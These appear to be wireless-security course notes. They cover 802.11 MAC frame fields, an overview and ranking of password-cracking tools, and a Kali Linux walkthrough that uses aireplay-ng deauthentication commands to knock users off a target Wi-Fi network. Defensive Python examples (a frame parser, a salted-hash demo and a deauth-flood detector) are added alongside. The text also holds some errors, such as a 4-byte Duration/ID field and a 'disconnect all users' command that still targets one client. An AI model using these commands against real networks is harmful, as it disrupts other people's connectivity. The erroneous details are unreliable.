Wireless Frame Generation
MAC Frame: The MAC layer frame consists of 9 fields. The following figure shows the basic
structure of an IEEE 802.11 MAC data frame along with the content of the frame control field.
Frame Control (FC) – A 2-byte field that defines the type of frame and carries some control
information. The fields present in FC are:
1. Version: A 2-bit field that indicates the current protocol version, which is fixed at 0 for now.
2. Type: A 2-bit field that determines the function of the frame, i.e. management (00),
control (01) or data (10).
3. Subtype: A 4-bit field that indicates the sub-type of the frame, e.g. 0000 for an
association request and 1000 for a beacon.
4. To DS: A 1-bit field which, when set, indicates that the frame is destined for the
DS (distribution system).
5. From DS: A 1-bit field which, when set, indicates that the frame is coming from the DS.
6. More frag (More fragments): A 1-bit field which, when set to 1, means the frame is
followed by further fragments.
7. Retry: A 1-bit field that is set to 1 if the current frame is a retransmission of an earlier
frame.
8. Power Mgmt (Power management): A 1-bit field that indicates the mode of a station
after successful transmission of a frame. Set to 1, it indicates that the station goes into
power-save mode; set to 0, the station stays active.
9. More data: A 1-bit field used to tell the receiver that the sender has more data to send
than the current frame. An access point can use it to tell a station in power-save mode that
more packets are buffered, or a station can use it after being polled to tell the access point
that more polling is necessary because the station has more data ready to transmit.
10. WEP: A 1-bit field that indicates that the standard security mechanism of 802.11 is
applied.
11. Order: A 1-bit field; if it is set to 1, the received frames must be processed in strict
order.
•Duration/ID – A 4-byte field containing a value that indicates the period of time for
which the medium is occupied (in µs).
•Address 1 to 4 – Four 6-byte fields that contain standard IEEE 802 MAC addresses
(48 bits each). The meaning of each address depends on the DS bits in the frame
control field.
•SC (Sequence control) – A 16-bit field consisting of 2 sub-fields: the Sequence number
(12 bits) and the Fragment number (4 bits). Because the acknowledgement mechanism can
cause frames to be duplicated, the sequence number is used to filter out duplicate frames.
•Data – A variable-length field containing information specific to the individual frame,
which is transferred transparently from the sender to the receiver(s).
•CRC (Cyclic redundancy check) – A 4-byte field containing a 32-bit CRC error-detection
sequence used to ensure an error-free frame.
Features of the IEEE 802.11 MAC frame:
Frame Control Field: The frame control field contains information about the type of
frame, the data rate, and the power management status.
Duration Field: The duration field specifies the length of time that the channel will be
occupied by the transmission.
Address Fields: The address fields specify the source and destination MAC addresses
of the Wi-Fi devices involved in the communication.
Sequence Control Field: The sequence control field is used to identify and manage
the transmission sequence of the frames.
Frame Body: The frame body contains the actual data being transmitted between Wi-Fi
devices, such as IP packets, TCP segments, or UDP datagrams.
Frame Check Sequence: The frame check sequence (FCS) is used to check the
integrity of the data transmitted in the frame and to detect any transmission errors.
Management, Control, and Data Frames: The IEEE 802.11 MAC frame
defines three types of frames: management frames, control frames, and data
frames. Management frames are used for network management, control frames
are used for coordination between Wi-Fi devices, and data frames are used for the
transmission of actual data.
Fragmentation: The IEEE 802.11 MAC frame supports fragmentation, which
allows large data packets to be divided into smaller fragments for transmission.
Acknowledgments: The IEEE 802.11 MAC frame uses acknowledgments to
confirm the successful transmission of frames and to request the retransmission of
any frames that were not successfully received.
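The following parser, added here as a worked example and not part of the original slides, walks the header layout described above: it decodes every Frame Control bit, the Duration/ID value, the three (or, for wireless-DS data frames, four) addresses and the sequence/fragment numbers, and verifies the trailing CRC-32 FCS. It reads Duration/ID as the 2-octet field of the IEEE 802.11 header layout and treats the FCS as transmitted least-significant byte first. The two sample frames (a broadcast deauthentication and a protected data frame arriving from the DS), their placeholder addresses and the reason-code body are constructed for this example.

```python
import struct
import zlib

# Names for the 2-bit Type field (value 3 is reserved).
FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "reserved"}
# Management subtypes mentioned in the text (association request, beacon) plus
# deauthentication, which matters for the DoS discussion later on.
MGMT_SUBTYPES = {0b0000: "association request", 0b1000: "beacon", 0b1100: "deauthentication"}


def mac_str(raw: bytes) -> str:
    """Render a 6-byte address as colon-separated hex."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame_control(fc: int) -> dict:
    """Decode the 16-bit Frame Control field (bit 0 is the first bit transmitted)."""
    return {
        "version": fc & 0x3,
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "to_ds": bool(fc & 0x0100),
        "from_ds": bool(fc & 0x0200),
        "more_frag": bool(fc & 0x0400),
        "retry": bool(fc & 0x0800),
        "power_mgmt": bool(fc & 0x1000),
        "more_data": bool(fc & 0x2000),
        "wep": bool(fc & 0x4000),  # called "Protected Frame" in later revisions
        "order": bool(fc & 0x8000),
    }


def parse_frame(frame: bytes) -> dict:
    """Split an 802.11 frame (header, body, trailing FCS) into its fields and check the CRC."""
    if len(frame) < 24 + 4:
        raise ValueError("frame shorter than a 3-address header plus FCS")
    fc_raw, duration = struct.unpack_from("<HH", frame, 0)
    fc = parse_frame_control(fc_raw)
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    (seq_ctrl,) = struct.unpack_from("<H", frame, 22)
    header_len, addr4 = 24, None
    # Address 4 exists only on data frames with both To DS and From DS set.
    if fc["type"] == 2 and fc["to_ds"] and fc["from_ds"]:
        addr4, header_len = frame[24:30], 30
    body, fcs = frame[header_len:-4], frame[-4:]
    # The FCS is CRC-32 over header and body, sent least-significant byte first.
    expected = struct.pack("<I", zlib.crc32(frame[:-4]) & 0xFFFFFFFF)
    return {
        "fc": fc,
        "type_name": FRAME_TYPES[fc["type"]],
        "subtype_name": MGMT_SUBTYPES.get(fc["subtype"]) if fc["type"] == 0 else None,
        "duration_us": duration,
        "addr1": mac_str(addr1),
        "addr2": mac_str(addr2),
        "addr3": mac_str(addr3),
        "addr4": mac_str(addr4) if addr4 else None,
        "sequence": seq_ctrl >> 4,   # upper 12 bits
        "fragment": seq_ctrl & 0xF,  # lower 4 bits
        "body": body,
        "fcs_ok": fcs == expected,
    }


# ---- constructed sample frames (addresses are locally administered placeholders) ----
def _with_fcs(payload: bytes) -> bytes:
    """Append a correct CRC-32 so the samples parse as error-free."""
    return payload + struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


BROADCAST = b"\xff" * 6
AP = bytes.fromhex("020000000001")
STA = bytes.fromhex("020000000002")
WIRED_HOST = bytes.fromhex("020000000003")

# Management/deauthentication (FC 0x00C0) to broadcast, reason code 7 in the body.
DEAUTH_FRAME = _with_fcs(
    struct.pack("<HH", 0x00C0, 314) + BROADCAST + AP + AP + struct.pack("<H", 10 << 4) + b"\x07\x00"
)
# Data frame from the DS with the WEP/Protected bit set (FC 0x4208) and an opaque body.
DATA_FRAME = _with_fcs(
    struct.pack("<HH", 0x4208, 44) + STA + AP + WIRED_HOST + struct.pack("<H", 100 << 4)
    + b"constructed ciphertext"
)

if __name__ == "__main__":
    for f in (DEAUTH_FRAME, DATA_FRAME):
        p = parse_frame(f)
        print(p["type_name"], p["subtype_name"], p["addr2"], "->", p["addr1"],
              "seq", p["sequence"], "fcs_ok", p["fcs_ok"])
```

Flipping any byte of the header or body makes `fcs_ok` false, which is exactly the check a receiver performs before trusting the other fields.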
1) What are Password Cracking tools?
Answer: These tools use different techniques to recover forgotten passwords. Some apps try to guess the passwords.
Others recover the passwords from a file stored in a local or remote location. Additionally, password cracking tools
also help in finding vulnerabilities in web applications.
2) How do Password Cracking apps work?
Answer: These applications make use of different methods for recovering passwords. Common techniques used
include Dictionary Attack, Brute Force Attack, Rainbow Table Attack, Cryptanalysis, and simply guessing the
password.
3) What are the uses of a Password Cracking application?
Answer: Password cracking software can be used to recover passwords that have been forgotten. You can also use
the tool for recovering social media accounts that have been stolen.
The tool can also be used by security experts to detect vulnerabilities. Web application developers can also use
password cracking tools to find out about security issues. It can help them secure the authentication algorithm
to protect the app against online attacks.
4) Is it legal to use a Password Cracking tool?
Answer: You can use this tool for recovering stolen or forgotten passwords. But it's illegal to use a
password cracking tool for hacking into another person's account or data.
CrackStation
CrackStation is a free online service for password hash cracking. This technique is a variation of the
Dictionary Attack that contains both dictionary words and passwords from public password dumps.
The service cracks password hashes by using pre-computed lookup tables consisting of over 15
billion entries that have been extracted from various online resources.
Features:
•Password hash cracking
•Supports LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384,
sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults.
•Uses a lookup table with over 15 billion entries.
•Works only for unsalted hashes.
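The "unsalted hashes only" limitation is the whole reason salting exists. The following Python, added here as an example and not code from CrackStation or from the slides, precomputes a tiny lookup table (a constructed four-word list standing in for the billions of entries) and shows that an unsalted MD5 gives every user with the same password the same digest, reversible with one dictionary lookup, while a per-user random salt plus a slow key-derivation function (PBKDF2-HMAC-SHA256 here; the iteration count is an illustrative assumption, not a recommendation) produces a different record each time and nothing a precomputed table can answer.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the dictionary words and leaked passwords
# that a lookup-table service precomputes (assumption: tiny, for illustration only).
WORDLIST = ["password", "letmein", "summer2023", "qwerty123"]


def build_lookup_table(words, algo="md5"):
    """Precompute digest -> plaintext for every word, as a lookup-table service does."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in words}


def lookup(table, digest_hex):
    """Reverse a digest with a single dictionary lookup; None when it is not in the table."""
    return table.get(digest_hex.lower())


# --- Weak storage: unsalted fast hash. Every user with the same password shares
# --- one digest, so a single precomputed table answers for all of them.
def store_unsalted(password, algo="md5"):
    return hashlib.new(algo, password.encode()).hexdigest()


# --- Hardened storage: per-user random salt plus a deliberately slow KDF.
PBKDF2_ITERATIONS = 100_000  # illustrative assumption; tune for the deployment


def store_salted(password, salt=None):
    """Return 'salt_hex$dk_hex'; a fresh 16-byte salt is drawn when none is given."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_salted(password, stored):
    """Recompute the KDF with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex),
                             PBKDF2_ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo():
    """Contrast the two storage schemes against the same precomputed table."""
    table = build_lookup_table(WORDLIST)
    unsalted = store_unsalted("summer2023")
    salted_a = store_salted("summer2023")
    salted_b = store_salted("summer2023")
    return {
        "unsalted_recovered": lookup(table, unsalted),               # "summer2023"
        "salted_recovered": lookup(table, salted_a.split("$")[1]),   # None
        "salted_records_differ": salted_a != salted_b,               # True: different salts
        "salted_verifies": verify_salted("summer2023", salted_a),    # True
        "wrong_password_rejected": not verify_salted("letmein", salted_a),  # True
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The salt defeats the precomputed table because the table would have to be rebuilt per salt value; the iteration count then makes each such rebuild expensive. Note that the KDF parameters here are a placeholder, and a deployment would pick them against its own hardware budget.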
AirCrack
Best for retrieving Wi-Fi passwords for free using the FMS Attack and other techniques.
AirCrack is a free desktop application used for cracking Wi-Fi passwords. The software cracks
WPA and WEP passwords. It can also be used to improve Wi-Fi security through monitoring, fake
access points, and testing connections. The application analyzes encrypted packets and tries to
crack them using its algorithm.
Features:
•Works on Windows, OS X, Linux, FreeBSD, NetBSD, OpenBSD, Solaris, and eComStation 2.
•Uses the FMS Attack.
•Supports WEP and WPA passwords.
•Monitoring, analyzing, and testing a Wi-Fi connection.
John The Ripper
Best for detecting weak passwords on Unix and macOS operating systems for free.
John The Ripper is a free tool that can be used for remote and local password recovery. The software
can be used by security experts to find out the strength of a password. This tool uses Brute Force
attack and Dictionary Attack features to detect passwords.
Features:
•Password cracking using Brute Force and Dictionary Attack techniques.
•Supports macOS, Linux, BeOS, OpenVMS, and Windows.
•Large password hash files
•Supports MIC, AVX2, AVX-512, ASIMD, MD5, and SHA
Verdict: John the Ripper is a popular open-source free cracking tool. You can use the software for free
for both commercial and non-commercial purposes. The tool has primarily been developed to detect
UNIX passwords. However, it can also be used for cracking Windows LM and other types of password
hashes.
Price: John the Ripper is available in two formats. The free, open-source format can be downloaded
and modified for non-commercial purposes. The commercial version of the software is also free and
is available for Linux and Mac OS X on Intel and AMD processors. The only difference is that the
Pro version is in a native format targeted at specific operating systems.
10 Best Password Cracker Software Solutions Ranked
AirCrack stands tall as the best password cracker thanks to features like wide system compatibility, easy
WiFi access, and a wide knowledge base. Here's how it stacks up against others on the list:
1. AirCrack — The best password cracker in 2023, with helpful documentation to help you access WiFi
whenever you need it.
2. Password Cracker — Get multi-language support to reveal your old Windows passwords.
3. Rainbow Crack — Access pre-made Rainbow Tables to attempt brute-force password cracking, or build
your own.
4. Medusa — Test your organization's password health with this cracker tool, given the right technical
know-how.
5. Brutus — When you need to crack a Windows password, this is your go-to tool; it's the best free
password cracker for the OS.
6. Crack Station — Create a free account and contribute to the tool's comprehensive look-up tables to
start cracking passwords.
7. OphCrack — An open-source password cracker using brute force techniques that work across
Windows, Mac, and Linux.
8. Hashcat — A comprehensive tool to crack multiple passwords at once across OSs and devices,
trusted by security testers.
9. John the Ripper — Check your password health locally or remotely using multiple password cracking
techniques.
10. THC Hydra — The best WiFi password cracker that also helps check your mobile and web app
password health.
What does a DoS Attack do?
A DoS attack aims to shut down a computer or a whole network, making it unreachable to its users. It
is accomplished by sending a huge volume of request traffic, or by sending data that makes the server crash.
Attackers mainly target web servers such as those of media companies, e-commerce websites, banks, etc. Most of
the time, a DoS attack doesn't result in loss of data.
Types of DoS Attack
There are 3 types of DoS attacks:
1. Application-layer flood: In this type of attack, an attacker sends a large number of requests to a
server, which results in server crashes and slow network speeds. In an application-layer flood, the request
rate may range from thousands per second to millions, consuming huge resources until the
server crashes or is unreachable to the user.
2. Distributed Denial of Service Attacks: There is not much difference between a DoS and a DDoS attack.
In this attack, not just one computer but several computers are engaged in sending
requests to a specific target, disabling it. These computers have been hacked earlier and can be
controlled by the attacker.
3. Unintended Denial of Service Attacks: This type of attack is not wicked, i.e. it is not nefarious. In this
attack, websites are overwhelmingly flooded with legitimate traffic to the point where the server is
brought down completely.
How To Perform a DOS Attack on WiFi?
Hacking Wi-Fi is the best way to check the security parameters and vulnerabilities of a network. In this
attack, we will use aircrack-ng and make the user unable to use Wi-Fi via a DoS attack. In this attack, we
will just scan all available Wi-Fi networks and collect their BSSID, channel, and type of security. Then we
will disable user access to the Wi-Fi by sending packets to its wireless access point.
Before starting, make sure you have Kali Linux on your computer and a Wi-Fi adaptor that supports monitor
mode.
Make sure Kali Linux is fully updated.
sudo apt update && sudo apt upgrade
Now, you are ready to perform a DoS attack.
•Start Kali Linux. Now open your terminal in three windows.
•Type ifconfig in the terminal to see the wireless adaptor.
•Just note down your Wi-Fi interface name.
•In the next step, we have to turn on monitor mode on our Wi-Fi adaptor. To turn it on, we will use the
below command.
airmon-ng start <wifi name>
•To check whether your wireless adaptor is in monitor mode or not, use this command.
iwconfig
•Scan nearby networks for their BSSID and channel.
airodump-ng -i <wifi name>
BSSID stands for Basic Service Set Identifier, and it's the MAC (physical) address of the access point or
wireless router that is used to connect to the WiFi.
•Now, stop the scanning process after copying the BSSID of the victim router.
•To send the packets which make the user unable to access the Wi-Fi network, type the below command.
aireplay-ng -0 <number of packets> -a <bssid of target network> -c <target client> <wifi name>
1. bssid of target network = copy the BSSID of the victim's router.
2. Target client = paste the MAC address of the user you want to disconnect specifically. (optional)
3. Wifi name = your adaptor name.
•Now, we need to configure our channel.
•Stop the network scanning. Press CTRL+C.
airodump-ng -c <broadcasting channel of router> -i <wifi name>
•To disconnect all users, type the below command.
aireplay-ng -0 <number of packets> -a <bssid of target network> -c <target client> <wifi name>
•This will send deauthentication packets and make the Wi-Fi network inaccessible to all users.
Now, no user will be able to connect to the network until we stop sending packets.
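From the defender's side, the aireplay-ng -0 step above shows up on the air as a burst of management frames of subtype 12 (deauthentication) or 10 (disassociation) from a single transmitter address, which is what a wireless intrusion detection sensor keys on. The following Python, added here as an example and not part of the original slides, counts such frames per transmitter (Address 2) in a sliding time window over a capture and flags any source that exceeds a threshold; the capture, the placeholder addresses, the window and the threshold are constructed for the example, and the sample frames carry no FCS because the check does not need one.

```python
from collections import defaultdict, deque

# Management frame (Type 0) subtypes that tear down a client's association.
DEAUTH_SUBTYPE = 12    # 0b1100
DISASSOC_SUBTYPE = 10  # 0b1010


def is_deauth_or_disassoc(frame: bytes) -> bool:
    """Read Type and Subtype from the first byte of Frame Control."""
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    return ftype == 0 and subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE)


def transmitter(frame: bytes) -> str:
    """Address 2 (bytes 10..15) is the transmitting station."""
    return ":".join(f"{b:02x}" for b in frame[10:16])


def detect_deauth_floods(captures, window_s=1.0, threshold=10):
    """Flag transmitters sending more than `threshold` deauth/disassoc frames per `window_s`.

    `captures` is an iterable of (timestamp_seconds, frame_bytes) in capture order.
    Returns {transmitter: timestamp at which the threshold was first exceeded}.
    """
    recent = defaultdict(deque)  # transmitter -> timestamps inside the window
    alerts = {}
    for ts, frame in captures:
        if len(frame) < 24 or not is_deauth_or_disassoc(frame):
            continue  # too short for a header, or not a teardown frame
        src = transmitter(frame)
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()  # drop timestamps that fell out of the window
        if len(q) > threshold and src not in alerts:
            alerts[src] = ts
    return alerts


# ---- constructed sample capture (no FCS; addresses are placeholders) ----
def _mgmt_frame(subtype: int, src: bytes, dst: bytes, seq: int) -> bytes:
    """Minimal 3-address management frame with a 2-byte reason-code body."""
    fc = bytes([subtype << 4, 0x00])
    seq_ctrl = bytes([(seq << 4) & 0xFF, (seq >> 4) & 0xFF])
    return fc + b"\x3a\x01" + dst + src + src + seq_ctrl + b"\x07\x00"


ROGUE = bytes.fromhex("020000000001")
REAL_AP = bytes.fromhex("020000000002")
CLIENT = bytes.fromhex("020000000003")
BROADCAST = b"\xff" * 6


def sample_capture():
    """Beacons and one legitimate deauth from the real AP, then a broadcast deauth flood."""
    frames = []
    for i in range(20):  # one beacon (subtype 8) every 100 ms
        frames.append((i * 0.1, _mgmt_frame(8, REAL_AP, BROADCAST, i)))
    frames.append((0.5, _mgmt_frame(DEAUTH_SUBTYPE, REAL_AP, CLIENT, 100)))
    for i in range(64):  # 64 broadcast deauths in 0.64 s from the rogue transmitter
        frames.append((1.0 + i * 0.01, _mgmt_frame(DEAUTH_SUBTYPE, ROGUE, BROADCAST, i)))
    return sorted(frames, key=lambda x: x[0])


if __name__ == "__main__":
    for src, ts in detect_deauth_floods(sample_capture()).items():
        print(f"deauth flood from {src} detected at t={ts:.2f}s")
```

The single deauth from the real access point stays below the threshold and is not reported, while the rogue source trips the detector on its eleventh frame; in a live sensor the same logic would run over frames taken from a monitor-mode interface, with the window and threshold tuned to the site's normal roaming rate.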